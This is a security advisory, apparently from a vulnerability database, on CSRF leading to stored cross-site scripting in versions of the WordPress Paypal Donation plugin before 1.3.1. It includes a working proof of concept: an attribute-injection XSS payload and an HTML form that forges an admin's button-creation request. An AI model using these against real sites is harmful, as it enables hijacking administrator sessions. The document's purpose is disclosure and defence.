Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting

2021-10-0400:00:00

dc11

368

0.001 Low

EPSS

Percentile

29.8%

JSON

The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button is lacking a CSRF check. An attacker could use this to make an authenticated admin create a new button. Furthermore, one of the Button field is not escaped before being output in an attribute when editing a Button, leading to a Stored Cross-Site Scripting issue as well.

Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter): " autofocus=autofocus onfocus=alert(/XSS/) e=

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The name, price and id params are not required. But they are displayed on the buttons overview and can be used to attract the victims attention to edit the Button. 

The XSS will trigger when editing the affected Button

References

plugins.trac.wordpress.org/changeset/2608073/

0.001 Low

EPSS

Percentile

29.8%

JSON

Related for WPEX-ID:5C73754C-EEBE-424A-9D3B-CA83EB53BF87